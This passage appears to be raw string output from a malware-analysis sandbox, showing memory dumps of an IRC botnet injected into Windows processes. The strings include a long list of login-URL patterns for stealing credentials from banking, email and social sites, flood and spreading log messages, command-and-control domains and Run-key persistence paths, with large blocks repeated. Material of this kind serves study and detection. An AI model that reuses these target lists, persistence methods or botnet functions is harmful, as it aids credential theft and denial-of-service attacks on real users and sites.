e><pre>*paypal.*/webscr?cmd=_login-submit*</pre><pre>%s / ?%d HTTP/1.1</pre><pre>Host: %s</pre><pre>User-Agent: %s</pre><pre>Mozilla/4.0</pre><pre>\\.\PHYSICALDRIVE0</pre><pre>shell32.dll</pre><pre>httpi</pre><pre>dnsapi.dll</pre><pre>http://%s/%s</pre><pre>http://%s/</pre><pre>POST /23s</pre><pre>[%s{%s%s{%s</pre><pre>n%s[%s{%s%s{%s</pre><pre>%s[%s{%s</pre><pre>[DNS]: Redirecting "%s" to "%s"</pre><pre>%s|%s</pre><pre>[Logins]: Cleared %d logins</pre><pre>FTP -></pre><pre>[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)</pre><pre>http://</pre><pre>[Login]: %s</pre><pre>[DNS]: Blocked %d domain(s) - Redirected %d domain(s)</pre><pre>[Speed]: Estimated upload speed %d KB/s</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\\.\%c:</pre><pre>*bebo.*/c/profile/comment_post.json</pre><pre>*bebo.*/mail/MailCompose.jsp*</pre><pre>*friendster.*/sendmessage.php*</pre><pre>*friendster.*/rpc.php</pre><pre>*vkontakte.ru/mail.php</pre><pre>*vkontakte.ru/wall.php</pre><pre>*vkontakte.ru/api.php</pre><pre>*facebook.*/ajax/*MessageComposerEndpoint.php*</pre><pre>msg_text</pre><pre>*facebook.*/ajax/chat/send.php*</pre><pre>-_.!~*'()</pre><pre>%s.%s hijacked!</pre><pre>MSG %d %s %d</pre><pre>MSG %d %1s</pre><pre>SDG %d %d</pre><pre>Content-Length: %d</pre><pre>SDG %d</pre><pre>%s_0xX</pre><pre>RegCreateKeyExW</pre><pre>RegCreateKeyExA</pre><pre>URLDownloadToFileW</pre><pre>URLDownloadToFileA</pre><pre>HttpSendRequestW</pre><pre>HttpSendRequestA</pre><pre>NtEnumerateValueKey</pre><pre>DNSAPI.dll</pre><pre>Secur32.dll</pre><pre>ShellExecuteA</pre><pre>SHELL32.dll</pre><pre>HttpQueryInfoA</pre><pre>InternetOpenUrlA</pre><pre>HttpQueryInfoW</pre><pre>WININET.dll</pre><pre>SHLWAPI.dll</pre><pre>WS2_32.dll</pre><pre>MSVCRT.dll</pre><pre>GetProcessHeap</pre><pre>ConnectNamedPipe</pre><pre>CreateNamedPipeA</pre><pre>DisconnectNamedPipe</pre><pre>GetWindowsDirectoryW</pre><pre>GetWindowsDirectoryA</pre><pre>KERNEL32.dll</pre><pre>USER32.dll</pre><pre>RegCloseKey</pre><pre>RegNotifyChangeKeyValue</pre><pre>RegOpenKeyExA</pre><pre>ADVAPI32.dll</pre><pre>ole32.dll</pre><pre>m1xg.org</pre><pre>mxxtxxt.biz</pre><pre>meob.me</pre><pre>]1.1.0.0</pre><pre>msn.set</pre><pre>msn.int</pre><pre>http.set</pre><pre>http.int</pre><pre>http.inj</pre><pre>logins</pre><pre>PASS %s</pre><pre>[.ShellClassInfo]</pre><pre>CLSID={645FF040-5081-101B-9F08-00AA002F954E}</pre><pre>SSRR %s 0 0 :%s</pre><pre>KCIK %s</pre><pre>SEND %s %s</pre><pre>PART %s</pre><pre>PPPPMSG %s :%s</pre><pre>QUIT :%s</pre><pre>PPNG %s</pre><pre>PPPPMSG</pre><pre>[v="%s" c="%s" h="%s" p="%S"]</pre><pre>[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d</pre><pre>[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d</pre><pre>[Slowloris]: Starting flood on "%s" for %d minute(s)</pre><pre>[Slowloris]: Finished flood on "%s"</pre><pre>[UDP]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[UDP]: Finished flood on "%s:%d"</pre><pre>[SYN]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[SYN]: Finished flood on "%s:%d"</pre><pre>[USB]: Infected %s</pre><pre>[MSN]: Updated MSN spread message to "%s"</pre><pre>[MSN]: Updated MSN spread interval to "%s"</pre><pre>[HTTP]: Updated HTTP spread message to "%s"</pre><pre>[HTTP]: Injected value is now %s.</pre><pre>[HTTP]: Updated HTTP spread interval to "%s"</pre><pre>[Visit]: Visited "%s"</pre><pre>[DNS]: Blocked "%s"</pre><pre>[usb="%d" msn="%d" http="%d" total="%d"]</pre><pre>[ftp="%d" pop="%d" http="%d" total="%d"]</pre><pre>[RSOCK4]: Started rsock4 on "%s:%d"</pre><pre>[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)</pre><pre>[d="%s"] Error downloading file [e="%d"]</pre><pre>[d="%s"] Error writing download to "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]</pre><pre>[d="%s"] Error getting temporary filename. [e="%d"]</pre><pre>[d='%s"] Error getting application data path [e="%d"]</pre><pre>[Visit]: Error visitng "%s"</pre><pre>[FTP Login]: %s</pre><pre>[POP3 Login]: %s</pre><pre>[FTP Infect]: %s was iframed</pre><pre>[HTTP Login]: %s</pre><pre>[HTTP Traffic]: %s</pre><pre>[Ruskill]: Detected File: "%s"</pre><pre>[Ruskill]: Detected DNS: "%s"</pre><pre>[Ruskill]: Detected Reg: "%s"</pre><pre>[PDef ]: %s</pre><pre>[DNS]: Blocked DNS "%s"</pre><pre>[MSN]: %s</pre><pre>[HTTP]: %s</pre><pre>ftplog</pre><pre>ftpinfect</pre><pre>httplogin</pre><pre>httptraff</pre><pre>httpspread</pre><pre>http://api.wipmania.com/</pre><pre>\\.\pipe\x_ipc</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\hsadjku.exe</pre><pre>C:\RECYCLER\S-1-5-21-0243556031-888888379-781863308-2266654\876668j1.exe</pre><pre>\\.\pipe\c1419a97</pre><pre>%WinDir%</pre><pre>%Documents and Settings%\%current user%\Application Data\Identities\Upwiwc.exe</pre><pre>7 767<7><pre>8*808;8~8</pre><pre>%s\Identities\%s.exe</pre><pre>\\.\pipe</pre><pre>autorun.inf</pre><pre>pidgin.exe</pre><pre>wlcomm.exe</pre><pre>msnmsgr.exe</pre><pre>msmsgs.exe</pre><pre>flock.exe</pre><pre>opera.exe</pre><pre>chrome.exe</pre><pre>ieuser.exe</pre><pre>iexplore.exe</pre><pre>firefox.exe</pre><pre>.ipconfig.exe</pre><pre>verclsid.exe</pre><pre>regedit.exe</pre><pre>rundll32.exe</pre><pre>cmd.exe</pre><pre>regsvr32.exe</pre><pre>l"%s" %S</pre><pre>lol.exe</pre><pre>n127.0.0.1</pre><pre>%s:Zone.Identifier</pre><pre>wininet.dll</pre><pre>secur32.dll</pre><pre>ws2_32.dll</pre><pre>:%S%S\</pre><pre>winlogon.exe</pre><pre>notepad.exe</pre><pre>Aadvapi32.dll</pre><pre>urlmon.dll</pre><pre>nspr4.dll</pre><pre>Akernel23.dll</pre><pre>y%s\%s.exe</pre><pre>lsass.exe</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\System</pre><pre>.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\Device\HarddiskVolume1\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\hsadjku.exe</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ksaduytr.exe</pre><b>hsadjku.exe_972_rwx_00A40000_0004E000:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.reloc</pre><pre>=MSG t</pre><pre>>MSG u`</pre><pre>=PASS</pre><pre>8httpu1</pre><pre>8httpuM</pre><pre>tlSSSSSSSSSShL0</pre><pre>%s.%s</pre><pre>%s.%S</pre><pre>%s.Blocked "%s" from removing our bot file!</pre><pre>%s.Blocked "%S" from removing our bot file!</pre><pre>i.root-servers.org</pre><pre>%s.Blocked "%s" from moving our bot file</pre><pre>%s.Blocked "%S" from moving our bot file</pre><pre>%s.p10-> Message hijacked!</pre><pre>%s.p10-> Message to %s hijacked!</pre><pre>%s.p21-> Message hijacked!</pre><pre>msnmsg</pre><pre>CAL %d %6s</pre><pre>ngr->blocksize: %d</pre><pre>block_size: %d</pre><pre>\\.\pipe\%s</pre><pre>kernel32.dll</pre><pre>%s_%d</pre><pre>-%sMutex</pre><pre>ntdll.dll</pre><pre>%s-pid</pre><pre>%s-comm</pre><pre>JOIN #</pre><pre>PRIVMSG #</pre><pre>%s.Blocked "%S" from creating "%S"</pre><pre>%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d.</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).</pre><pre>PRIVMSG %5s</pre><pre>JOIN %5s</pre><pre>PRIVMSG</pre><pre>JOIN</pre><pre>%s:%d</pre><pre>%s.%s%s</pre><pre>%S%s%s</pre><pre>%s.%S%S</pre><pre>%S%S%S</pre><pre>state_%s</pre><pre>%s.%s (p='%S')</pre><pre>pop3://%s:%s@%s:%d</pre><pre>%s:%s@%s:%d</pre><pre>ftp://%s:%s@%s:%d</pre><pre>ftpgrab</pre><pre>%s.%s ->> %s (%s : %s)</pre><pre>%s.%s ->> %s : %s</pre><pre>%s-%s-%s</pre><pre>%s.Blocked possible browser exploit pack call on URL '%s'</pre><pre>%s.Blocked possible browser exploit pack call on URL '%S'</pre><pre>webroot.</pre><pre>virusbuster.nprotect.</pre><pre>heck.tc</pre><pre>onecare.live.</pre><pre>login[password]</pre><pre>login[username]</pre><pre>*members*.iknowthatgirl*/members*</pre><pre>*youporn.*/login*</pre><pre>*members.brazzers.com*</pre><pre>*bcointernacional*login*</pre><pre>*:2222/CMD_LOGIN*</pre><pre>*whcms*dologin*</pre><pre>*:2086/login*</pre><pre>*:2083/login*</pre><pre>*:2082/login*</pre><pre>*webnames.ru/*user_login*</pre><pre>Webnames</pre><pre>*dotster.com/*login*</pre><pre>loginid</pre><pre>*enom.com/login*</pre><pre>login.Pass</pre><pre>login.User</pre><pre>*login.Pass=*</pre><pre>*1and1.com/xml/config*</pre><pre>*moniker.com/*Login*</pre><pre>LoginPassword</pre><pre>LoginUserName</pre><pre>*LoginPassword=*</pre><pre>*namecheap.com/*login*</pre><pre>loginname</pre><pre>*godaddy.com/login*</pre><pre>Password</pre><pre>*Password=*</pre><pre>*alertpay.com/login*</pre><pre>*netflix.com/*ogin*</pre><pre>*thepiratebay.org/login*</pre><pre>*torrentleech.org/*login*</pre><pre>*vip-file.com/*/signin-do*</pre><pre>*sms4file.com/*/signin-do*</pre><pre>*letitbit.net*</pre><pre>*what.cd/login*</pre><pre>*oron.com/login*</pre><pre>*filesonic.com/*login*</pre><pre>*speedyshare.com/login*</pre><pre>*uploaded.to/*login*</pre><pre>*uploading.com/*login*</pre><pre>loginUserPassword</pre><pre>loginUserName</pre><pre>*loginUserPassword=*</pre><pre>*fileserv.com/login*</pre><pre>*hotfile.com/login*</pre><pre>*4shared.com/login*</pre><pre>txtpass</pre><pre>*txtpass=*</pre><pre>*netload.in/index*</pre><pre>*freakshare.com/login*</pre><pre>login_pass</pre><pre>*login_pass=*</pre><pre>*mediafire.com/*login*</pre><pre>*sendspace.com/login*</pre><pre>*megaupload.*/*login*</pre><pre>*depositfiles.*/*/login*</pre><pre>*signin.ebay*SignIn</pre><pre>*officebanking.cl/*login.asp*</pre><pre>*secure.logmein.*/*logincheck*</pre><pre>session[password]</pre><pre>*password]=*</pre><pre>*twitter.com/sessions</pre><pre>txtPassword</pre><pre>*&txtPassword=*</pre><pre>*.moneybookers.*/*login.pl</pre><pre>*runescape*/*weblogin*</pre><pre>*&password=*</pre><pre>*no-ip*/login*</pre><pre>*steampowered*/login*</pre><pre>quick_password</pre><pre>*hackforums.*/member.php</pre><pre>*facebook.*/login.php*</pre><pre>*login.yahoo.*/*login*</pre><pre>passwd</pre><pre>login</pre><pre>*passwd=*</pre><pre>*login.live.*/*post.srf*</pre><pre>TextfieldPassword</pre><pre>*TextfieldPassword=*</pre><pre>*gmx.*/*FormLogin*</pre><pre>*Passwd=*</pre><pre>FLN-Password</pre><pre>*FLN-Password=*</pre><pre>*pass=*</pre><pre>*bigstring.*/*index.php*</pre><pre>*screenname.aol.*/login.psp*</pre><pre>password</pre><pre>loginId</pre><pre>*password=*</pre><pre>*aol.*/*login.psp*</pre><pre>Passwd</pre><pre>*google.*/*ServiceLoginAuth*</pre><pre>login_password</pre><pre>login_email</pre><pre>*login_password=*</pre><pre>*paypal.*/webscr?cmd=_login-submit*</pre><pre>%s / ?%d HTTP/1.1</pre><pre>Host: %s</pre><pre>User-Agent: %s</pre><pre>Mozilla/4.0</pre><pre>\\.\PHYSICALDRIVE0</pre><pre>shell32.dll</pre><pre>httpi</pre><pre>dnsapi.dll</pre><pre>http://%s/%s</pre><pre>http://%s/</pre><pre>POST /23s</pre><pre>[%s{%s%s{%s</pre><pre>n%s[%s{%s%s{%s</pre><pre>%s[%s{%s</pre><pre>[DNS]: Redirecting "%s" to "%s"</pre><pre>%s|%s</pre><pre>[Logins]: Cleared %d logins</pre><pre>FTP -></pre><pre>[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)</pre><pre>http://</pre><pre>[Login]: %s</pre><pre>[DNS]: Blocked %d domain(s) - Redirected %d domain(s)</pre><pre>[Speed]: Estimated upload speed %d KB/s</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\\.\%c:</pre><pre>*bebo.*/c/profile/comment_post.json</pre><pre>*bebo.*/mail/MailCompose.jsp*</pre><pre>*friendster.*/sendmessage.php*</pre><pre>*friendster.*/rpc.php</pre><pre>*vkontakte.ru/mail.php</pre><pre>*vkontakte.ru/wall.php</pre><pre>*vkontakte.ru/api.php</pre><pre>*facebook.*/ajax/*MessageComposerEndpoint.php*</pre><pre>msg_text</pre><pre>*facebook.*/ajax/chat/send.php*</pre><pre>-_.!~*'()</pre><pre>%s.%s hijacked!</pre><pre>MSG %d %s %d</pre><pre>MSG %d %1s</pre><pre>SDG %d %d</pre><pre>Content-Length: %d</pre><pre>SDG %d</pre><pre>%s_0xX</pre><pre>RegCreateKeyExW</pre><pre>RegCreateKeyExA</pre><pre>URLDownloadToFileW</pre><pre>URLDownloadToFileA</pre><pre>HttpSendRequestW</pre><pre>HttpSendRequestA</pre><pre>NtEnumerateValueKey</pre><pre>DNSAPI.dll</pre><pre>Secur32.dll</pre><pre>ShellExecuteA</pre><pre>SHELL32.dll</pre><pre>HttpQueryInfoA</pre><pre>InternetOpenUrlA</pre><pre>HttpQueryInfoW</pre><pre>WININET.dll</pre><pre>SHLWAPI.dll</pre><pre>WS2_32.dll</pre><pre>MSVCRT.dll</pre><pre>GetProcessHeap</pre><pre>ConnectNamedPipe</pre><pre>CreateNamedPipeA</pre><pre>DisconnectNamedPipe</pre><pre>GetWindowsDirectoryW</pre><pre>GetWindowsDirectoryA</pre><pre>KERNEL32.dll</pre><pre>USER32.dll</pre><pre>RegCloseKey</pre><pre>RegNotifyChangeKeyValue</pre><pre>RegOpenKeyExA</pre><pre>ADVAPI32.dll</pre><pre>ole32.dll</pre><pre>m1xg.org</pre><pre>mxxtxxt.biz</pre><pre>meob.me</pre><pre>]1.1.0.0</pre><pre>msn.set</pre><pre>msn.int</pre><pre>http.set</pre><pre>http.int</pre><pre>http.inj</pre><pre>logins</pre><pre>PASS %s</pre><pre>[.ShellClassInfo]</pre><pre>CLSID={645FF040-5081-101B-9F08-00AA002F954E}</pre><pre>SSRR %s 0 0 :%s</pre><pre>KCIK %s</pre><pre>SEND %s %s</pre><pre>PART %s</pre><pre>PPPPMSG %s :%s</pre><pre>QUIT :%s</pre><pre>PPNG %s</pre><pre>PPPPMSG</pre><pre>[v="%s" c="%s" h="%s" p="%S"]</pre><pre>[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d</pre><pre>[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d</pre><pre>[Slowloris]: Starting flood on "%s" for %d minute(s)</pre><pre>[Slowloris]: Finished flood on "%s"</pre><pre>[UDP]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[UDP]: Finished flood on "%s:%d"</pre><pre>[SYN]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[SYN]: Finished flood on "%s:%d"</pre><pre>[USB]: Infected %s</pre><pre>[MSN]: Updated MSN spread message to "%s"</pre><pre>[MSN]: Updated MSN spread interval to "%s"</pre><pre>[HTTP]: Updated HTTP spread message to "%s"</pre><pre>[HTTP]: Injected value is now %s.</pre><pre>[HTTP]: Updated HTTP spread interval to "%s"</pre><pre>[Visit]: Visited "%s"</pre><pre>[DNS]: Blocked "%s"</pre><pre>[usb="%d" msn="%d" http="%d" total="%d"]</pre><pre>[ftp="%d" pop="%d" http="%d" total="%d"]</pre><pre>[RSOCK4]: Started rsock4 on "%s:%d"</pre><pre>[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)</pre><pre>[d="%s"] Error downloading file [e="%d"]</pre><pre>[d="%s"] Error writing download to "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]</pre><pre>[d="%s"] Error getting temporary filename. [e="%d"]</pre><pre>[d='%s"] Error getting application data path [e="%d"]</pre><pre>[Visit]: Error visitng "%s"</pre><pre>[FTP Login]: %s</pre><pre>[POP3 Login]: %s</pre><pre>[FTP Infect]: %s was iframed</pre><pre>[HTTP Login]: %s</pre><pre>[HTTP Traffic]: %s</pre><pre>[Ruskill]: Detected File: "%s"</pre><pre>[Ruskill]: Detected DNS: "%s"</pre><pre>[Ruskill]: Detected Reg: "%s"</pre><pre>[PDef ]: %s</pre><pre>[DNS]: Blocked DNS "%s"</pre><pre>[MSN]: %s</pre><pre>[HTTP]: %s</pre><pre>ftplog</pre><pre>ftpinfect</pre><pre>httplogin</pre><pre>httptraff</pre><pre>httpspread</pre><pre>http://api.wipmania.com/</pre><pre>\\.\pipe\x_ipc</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ksaduytr.exe</pre><pre>%Documents and Settings%\%current user%\Application Data\Identities\Upwiwc.exe</pre><pre>7 767<7><pre>8*808;8~8</pre><pre>%s\Identities\%s.exe</pre><pre>\\.\pipe</pre><pre>autorun.inf</pre><pre>pidgin.exe</pre><pre>wlcomm.exe</pre><pre>msnmsgr.exe</pre><pre>msmsgs.exe</pre><pre>flock.exe</pre><pre>opera.exe</pre><pre>chrome.exe</pre><pre>ieuser.exe</pre><pre>iexplore.exe</pre><pre>firefox.exe</pre><pre>.ipconfig.exe</pre><pre>verclsid.exe</pre><pre>regedit.exe</pre><pre>rundll32.exe</pre><pre>cmd.exe</pre><pre>regsvr32.exe</pre><pre>l"%s" %S</pre><pre>lol.exe</pre><pre>n127.0.0.1</pre><pre>%s:Zone.Identifier</pre><pre>wininet.dll</pre><pre>secur32.dll</pre><pre>ws2_32.dll</pre><pre>:%S%S\</pre><pre>winlogon.exe</pre><pre>notepad.exe</pre><pre>Aadvapi32.dll</pre><pre>urlmon.dll</pre><pre>nspr4.dll</pre><pre>Akernel23.dll</pre><pre>y%s\%s.exe</pre><pre>lsass.exe</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\System</pre><pre>.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run</pre><b>svchost.exe_340_rwx_00C80000_0004E000:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.reloc</pre><pre>=MSG t</pre><pre>>MSG u`</pre><pre>=PASS</pre><pre>8httpu1</pre><pre>8httpuM</pre><pre>tlSSSSSSSSSShL0</pre><pre>%s.%s</pre><pre>%s.%S</pre><pre>%s.Blocked "%s" from removing our bot file!</pre><pre>%s.Blocked "%S" from removing our bot file!</pre><pre>i.root-servers.org</pre><pre>%s.Blocked "%s" from moving our bot file</pre><pre>%s.Blocked "%S" from moving our bot file</pre><pre>%s.p10-> Message hijacked!</pre><pre>%s.p10-> Message to %s hijacked!</pre><pre>%s.p21-> Message hijacked!</pre><pre>msnmsg</pre><pre>CAL %d %6s</pre><pre>ngr->blocksize: %d</pre><pre>block_size: %d</pre><pre>\\.\pipe\%s</pre><pre>kernel32.dll</pre><pre>%s_%d</pre><pre>-%sMutex</pre><pre>ntdll.dll</pre><pre>%s-pid</pre><pre>%s-comm</pre><pre>JOIN #</pre><pre>PRIVMSG #</pre><pre>%s.Blocked "%S" from creating "%S"</pre><pre>%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d.</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).</pre><pre>PRIVMSG %5s</pre><pre>JOIN %5s</pre><pre>PRIVMSG</pre><pre>JOIN</pre><pre>%s:%d</pre><pre>%s.%s%s</pre><pre>%S%s%s</pre><pre>%s.%S%S</pre><pre>%S%S%S</pre><pre>state_%s</pre><pre>%s.%s (p='%S')</pre><pre>pop3://%s:%s@%s:%d</pre><pre>%s:%s@%s:%d</pre><pre>ftp://%s:%s@%s:%d</pre><pre>ftpgrab</pre><pre>%s.%s ->> %s (%s : %s)</pre><pre>%s.%s ->> %s : %s</pre><pre>%s-%s-%s</pre><pre>%s.Blocked possible browser exploit pack call on URL '%s'</pre><pre>%s.Blocked possible browser exploit pack call on URL '%S'</pre><pre>webroot.</pre><pre>virusbuster.nprotect.</pre><pre>heck.tc</pre><pre>onecare.live.</pre><pre>login[password]</pre><pre>login[username]</pre><pre>*members*.iknowthatgirl*/members*</pre><pre>*youporn.*/login*</pre><pre>*members.brazzers.com*</pre><pre>*bcointernacional*login*</pre><pre>*:2222/CMD_LOGIN*</pre><pre>*whcms*dologin*</pre><pre>*:2086/login*</pre><pre>*:2083/login*</pre><pre>*:2082/login*</pre><pre>*webnames.ru/*user_login*</pre><pre>Webnames</pre><pre>*dotster.com/*login*</pre><pre>loginid</pre><pre>*enom.com/login*</pre><pre>login.Pass</pre><pre>login.User</pre><pre>*login.Pass=*</pre><pre>*1and1.com/xml/config*</pre><pre>*moniker.com/*Login*</pre><pre>LoginPassword</pre><pre>LoginUserName</pre><pre>*LoginPassword=*</pre><pre>*namecheap.com/*login*</pre><pre>loginname</pre><pre>*godaddy.com/login*</pre><pre>Password</pre><pre>*Password=*</pre><pre>*alertpay.com/login*</pre><pre>*netflix.com/*ogin*</pre><pre>*thepiratebay.org/login*</pre><pre>*torrentleech.org/*login*</pre><pre>*vip-file.com/*/signin-do*</pre><pre>*sms4file.com/*/signin-do*</pre><pre>*letitbit.net*</pre><pre>*what.cd/login*</pre><pre>*oron.com/login*</pre><pre>*filesonic.com/*login*</pre><pre>*speedyshare.com/login*</pre><pre>*uploaded.to/*login*</pre><pre>*uploading.com/*login*</pre><pre>loginUserPassword</pre><pre>loginUserName</pre><pre>*loginUserPassword=*</pre><pre>*fileserv.com/login*</pre><pre>*hotfile.com/login*</pre><pre>*4shared.com/login*</pre><pre>txtpass</pre><pre>*txtpass=*</pre><pre>*netload.in/index*</pre><pre>*freakshare.com/login*</pre><pre>login_pass</pre><pre>*login_pass=*</pre><pre>*mediafire.com/*login*</pre><pre>*sendspace.com/login*</pre><pre>*megaupload.*/*login*</pre><pre>*depositfiles.*/*/login*</pre><pre>*signin.ebay*SignIn</pre><pre>*officebanking.cl/*login.asp*</pre><pre>*secure.logmein.*/*logincheck*</pre><pre>session[password]</pre><pre>*password]=*</pre><pre>*twitter.com/sessions</pre><pre>txtPassword</pre><pre>*&txtPassword=*</pre><pre>*.moneybookers.*/*login.pl</pre><pre>*runescape*/*weblogin*</pre><pre>*&password=*</pre><pre>*no-ip*/login*</pre><pre>*steampowered*/login*</pre><pre>quick_password</pre><pre>*hackforums.*/member.php</pre><pre>*facebook.*/login.php*</pre><pre>*login.yahoo.*/*login*</pre><pre>passwd</pre><pre>login</pre><pre>*passwd=*</pre><pre>*login.live.*/*post.srf*</pre><pre>TextfieldPassword</pre><pre>*TextfieldPassword=*</pre><pre>*gmx.*/*FormLogin*</pre><pre>*Passwd=*</pre><pre>FLN-Password</pre><pre>*FLN-Password=*</pre><pre>*pass=*</pre><pre>*bigstring.*/*index.php*</pre><pre>*screenname.aol.*/login.psp*</pre><pre>password</pre><pre>loginId</pre><pre>*password=*</pre><pre>*aol.*/*login.psp*</pre><pre>Passwd</pre><pre>*google.*/*ServiceLoginAuth*</pre><pre>login_password</pre><pre>login_email</pre><pre>*login_password=*</pre><pre>*paypal.*/webscr?cmd=_login-submit*</pre><pre>%s / ?%d HTTP/1.1</pre><pre>Host: %s</pre><pre>User-Agent: %s</pre><pre>Mozilla/4.0</pre><pre>\\.\PHYSICALDRIVE0</pre><pre>shell32.dll</pre><pre>httpi</pre><pre>dnsapi.dll</pre><pre>http://%s/%s</pre><pre>http://%s/</pre><pre>POST /23s</pre><pre>[%s{%s%s{%s</pre><pre>n%s[%s{%s%s{%s</pre><pre>%s[%s{%s</pre><pre>[DNS]: Redirecting "%s" to "%s"</pre><pre>%s|%s</pre><pre>[Logins]: Cleared %d logins</pre><pre>FTP -></pre><pre>[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)</pre><pre>http://</pre><pre>[Login]: %s</pre><pre>[DNS]: Blocked %d domain(s) - Redirected %d domain(s)</pre><pre>[Speed]: Estimated upload speed %d KB/s</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\\.\%c:</pre><pre>*bebo.*/c/profile/comment_post.json</pre><pre>*bebo.*/mail/MailCompose.jsp*</pre><pre>*friendster.*/sendmessage.php*</pre><pre>*friendster.*/rpc.php</pre><pre>*vkontakte.ru/mail.php</pre><pre>*vkontakte.ru/wall.php</pre><pre>*vkontakte.ru/api.php</pre><pre>*facebook.*/ajax/*MessageComposerEndpoint.php*</pre><pre>msg_text</pre><pre>*facebook.*/ajax/chat/send.php*</pre><pre>-_.!~*'()</pre><pre>%s.%s hijacked!</pre><pre>MSG %d %s %d</pre><pre>MSG %d %1s</pre><pre>SDG %d %d</pre><pre>Content-Length: %d</pre><pre>SDG %d</pre><pre>%s_0xX</pre><pre>RegCreateKeyExW</pre><pre>RegCreateKeyExA</pre><pre>URLDownloadToFileW</pre><pre>URLDownloadToFileA</pre><pre>HttpSendRequestW</pre><pre>HttpSendRequestA</pre><pre>NtEnumerateValueKey</pre><pre>DNSAPI.dll</pre><pre>Secur32.dll</pre><pre>ShellExecuteA</pre><pre>SHELL32.dll</pre><pre>HttpQueryInfoA</pre><pre>InternetOpenUrlA</pre><pre>HttpQueryInfoW</pre><pre>WININET.dll</pre><pre>SHLWAPI.dll</pre><pre>WS2_32.dll</pre><pre>MSVCRT.dll</pre><pre>GetProcessHeap</pre><pre>ConnectNamedPipe</pre><pre>CreateNamedPipeA</pre><pre>DisconnectNamedPipe</pre><pre>GetWindowsDirectoryW</pre><pre>GetWindowsDirectoryA</pre><pre>KERNEL32.dll</pre><pre>USER32.dll</pre><pre>RegCloseKey</pre><pre>RegNotifyChangeKeyValue</pre><pre>RegOpenKeyExA</pre><pre>ADVAPI32.dll</pre><pre>ole32.dll</pre><pre>m1xg.org</pre><pre>mxxtxxt.biz</pre><pre>meob.me</pre><pre>]1.1.0.0</pre><pre>msn.set</pre><pre>msn.int</pre><pre>http.set</pre><pre>http.int</pre><pre>http.inj</pre><pre>logins</pre><pre>PASS %s</pre><pre>[.ShellClassInfo]</pre><pre>CLSID={645FF040-5081-101B-9F08-00AA002F954E}</pre><pre>SSRR %s 0 0 :%s</pre><pre>KCIK %s</pre><pre>SEND %s %s</pre><pre>PART %s</pre><pre>PPPPMSG %s :%s</pre><pre>QUIT :%s</pre><pre>PPNG %s</pre><pre>PPPPMSG</pre><pre>[v="%s" c="%s" h="%s" p="%S"]</pre><pre>[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d</pre><pre>[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d</pre><pre>[Slowloris]: Starting flood on "%s" for %d minute(s)</pre><pre>[Slowloris]: Finished flood on "%s"</pre><pre>[UDP]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[UDP]: Finished flood on "%s:%d"</pre><pre>[SYN]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[SYN]: Finished flood on "%s:%d"</pre><pre>[USB]: Infected %s</pre><pre>[MSN]: Updated MSN spread message to "%s"</pre><pre>[MSN]: Updated MSN spread interval to "%s"</pre><pre>[HTTP]: Updated HTTP spread message to "%s"</pre><pre>[HTTP]: Injected value is now %s.</pre><pre>[HTTP]: Updated HTTP spread interval to "%s"</pre><pre>[Visit]: Visited "%s"</pre><pre>[DNS]: Blocked "%s"</pre><pre>[usb="%d" msn="%d" http="%d" total="%d"]</pre><pre>[ftp="%d" pop="%d" http="%d" total="%d"]</pre><pre>[RSOCK4]: Started rsock4 on "%s:%d"</pre><pre>[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)</pre><pre>[d="%s"] Error downloading file [e="%d"]</pre><pre>[d="%s"] Error writing download to "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]</pre><pre>[d="%s"] Error getting temporary filename. [e="%d"]</pre><pre>[d='%s"] Error getting application data path [e="%d"]</pre><pre>[Visit]: Error visitng "%s"</pre><pre>[FTP Login]: %s</pre><pre>[POP3 Login]: %s</pre><pre>[FTP Infect]: %s was iframed</pre><pre>[HTTP Login]: %s</pre><pre>[HTTP Traffic]: %s</pre><pre>[Ruskill]: Detected File: "%s"</pre><pre>[Ruskill]: Detected DNS: "%s"</pre><pre>[Ruskill]: Detected Reg: 